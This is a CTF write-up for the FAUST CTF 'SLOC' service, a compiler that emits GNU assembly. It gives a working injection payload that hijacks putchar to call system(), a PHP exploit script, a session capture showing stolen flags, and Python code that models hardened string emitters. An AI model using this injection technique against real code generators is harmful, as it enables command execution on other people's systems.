@v0s
Last active May 30, 2019 12:59
FAUST CTF SLOC writeup

The challenge features a custom language compiler/preprocessor that generates GNU ASM source, compiles it and executes the resulting binary.

The first bug we exploited was an RCE leveraging unescaped strings in the generated assembly code: string literals from the SLOC source are pasted verbatim between the quotes of a GAS .asciz directive.

SLOC source code that triggers the vulnerability:

CALL WRITECHAR "id\x00\"
CALL WRITECHAR ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"

([\r] should be replaced by the real \x0D characters — they will serve as whitespace for GAS)

Generated assembly code:

.global main
.text
main:
push %rbp
mov %rsp, %rbp
sub $0, %rsp
leaq string0(%rip), %rdi
call putchar@PLT
leaq string1(%rip), %rdi
call putchar@PLT
xor %rax, %rax
mov %rbp, %rsp
pop %rbp
ret

string0:
.asciz "id\x00\"
string1:
.asciz ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"

Let's re-format the bottom part slightly for it to be more obvious:

string0:
.asciz "id\x00\"\nstring1:\n.asciz "

string1:
  putchar:
    call system@PLT
    call exit@PLT
#"

Thanks to the trailing \ injected into string0, we break out of the string literal, define a putchar label that gets called instead of the library function, and make it run our shell command: the first call putchar@PLT still receives the address of string0 in %rdi, so our label passes "id" straight to system() and then exits.
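To show what a fix looks like, here is an added example (not part of the writeup and not SLOC's own code) that models the vulnerable emitter beside two hardened ones and checks, with a simplified model of GAS statement splitting, whether the writeup's payload still manages to define a putchar label. The generator shape, the emit_* helpers, gas_statements and defined_labels are all assumptions for illustration; the only page-sourced pieces are the two payload strings and the layout of the generated program.

```python
import re

# Constructed inputs: the two WRITECHAR strings from the writeup's PoC, with the
# "[\r]" placeholders replaced by real carriage returns as the writeup says.
PAYLOAD_STRING0 = 'id\\x00\\'                       # id\x00\   (trailing backslash)
PAYLOAD_STRING1 = ';string1:putchar:call\rsystem@PLT;call\rexit@PLT;#'


def emit_asciz_unsafe(label, s):
    """Mirror the bug: user bytes are pasted verbatim between the .asciz quotes."""
    return f'{label}:\n.asciz "{s}"\n'


def emit_bytes_safe(label, s):
    """Hardened: emit every byte numerically plus a NUL terminator. Nothing the
    user typed ever reaches the assembler's lexer, so no quote, newline, ';'
    or '#' can change the statement structure."""
    data = s.encode('utf-8') + b'\x00'
    return f'{label}:\n.byte ' + ', '.join(f'0x{b:02x}' for b in data) + '\n'


def emit_asciz_escaped(label, s):
    """Alternative fix that keeps .asciz: escape backslash and quote, and emit
    every non-printable byte as a \\ooo octal escape (covers CR, LF, NUL)."""
    out = []
    for b in s.encode('utf-8'):
        if b == 0x5c:
            out.append('\\\\')
        elif b == 0x22:
            out.append('\\"')
        elif 0x20 <= b < 0x7f:
            out.append(chr(b))
        else:
            out.append(f'\\{b:03o}')
    return f'{label}:\n.asciz "{"".join(out)}"\n'


def generate(strings, emit):
    """Reproduce the shape of the SLOC output shown in the writeup: one
    leaq/call putchar@PLT pair per string, then the string data."""
    lines = ['.global main', '.text', 'main:', 'push %rbp', 'mov %rsp, %rbp', 'sub $0, %rsp']
    for i in range(len(strings)):
        lines += [f'leaq string{i}(%rip), %rdi', 'call putchar@PLT']
    lines += ['xor %rax, %rax', 'mov %rbp, %rsp', 'pop %rbp', 'ret', '']
    asm = '\n'.join(lines) + '\n'
    for i, s in enumerate(strings):
        asm += emit(f'string{i}', s)
    return asm


def gas_statements(asm):
    """Simplified model of how GAS lexes x86 input: newline and ';' end a
    statement, '#' starts a comment to end of line, and a '"' literal runs
    until the next unescaped '"'. A newline inside a literal only warns in
    GAS and is kept as string content, which is exactly what the PoC relies on."""
    stmts, cur, in_str, i, n = [], [], False, 0, len(asm)
    while i < n:
        c = asm[i]
        if in_str:
            cur.append(c)
            if c == '\\' and i + 1 < n:        # escape pair: keep both chars
                cur.append(asm[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            cur.append(c)
        elif c == '#':                           # comment: skip to end of line
            while i < n and asm[i] != '\n':
                i += 1
            continue
        elif c in '\n;':
            stmts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    stmts.append(''.join(cur).strip())
    return [s for s in stmts if s]


LABEL = re.compile(r'^\s*([A-Za-z_.$][\w.$]*)\s*:')


def defined_labels(asm):
    """Labels the assembler would define (several may share one statement)."""
    labels = []
    for st in gas_statements(asm):
        while (m := LABEL.match(st)):
            labels.append(m.group(1))
            st = st[m.end():]
    return labels


if __name__ == '__main__':
    payload = [PAYLOAD_STRING0, PAYLOAD_STRING1]
    for name, emit in [('unsafe .asciz', emit_asciz_unsafe),
                       ('.byte list', emit_bytes_safe),
                       ('escaped .asciz', emit_asciz_escaped)]:
        print(f'{name:15s} labels: {defined_labels(generate(payload, emit))}')
```

With the unsafe emitter the model reports main, string0, string1 and putchar as defined labels, reproducing the hijack; with either hardened emitter putchar never appears, because the user data is no longer interpreted as assembler syntax. The .byte form is the one to prefer: it needs no knowledge of GAS escape rules at all.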

The original PoC SLOC code and the exploit script are attached below: a sample session against the service, the PHP sender, and the SLOC payload it reads from test.sl.

root@voshiba:~# ./splo.php 127.0.0.1
Welcome to SLOC - your Simple Language Online Compiler

What do you want to do?
1 <size>\n<code (size bytes)  Compiles and runs your program
                              Prints the result and gives you an (id, pwd)
                              to get your out again later
2 <id> <pwd>                  Shows to result of the given run again
3                             Lists all recent run ids

runs/bla:FAUST_blablablablaba
runs/test:FAUST_qweyqwieuywqiue
runs/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
runs/tmpxdkw8t_o3XO3TRUHN6CCAM2S:RX7QZWZIW66BDRNOruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiueruns/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
SUCC: Submission stored with id tmpcq_f5drkENYXKHEYE3AB6QW3 and pwd 3RUVNHAASYEWXGEA
#!/usr/bin/php
<?php
// Read the SLOC payload (the two CALL WRITECHAR lines) from test.sl
$payload = file_get_contents("test.sl");
$ip = $argv[1];
// The SLOC service listens on 64646; give up after a 3 second connect timeout
$s = fsockopen($ip, 64646, $errno, $errstr, 3);
if (!$s) {
    exit;
}
// Menu option 1: "1 <size>\n<code>" compiles and runs the submitted program
fwrite($s, "1 " . strlen($payload) . "\n" . $payload);
// No SIGALRM handler is installed, so the alarm simply kills the script
// after 5 seconds if the service never closes the socket
pcntl_alarm(5);
while (!feof($s)) {
    echo fgetc($s);
}
CALL WRITECHAR "grep\x20-r\x20.AUST\x20runs/\x00\"
CALL WRITECHAR ";string1:putchar: call system@PLT; call exit@PLT; #"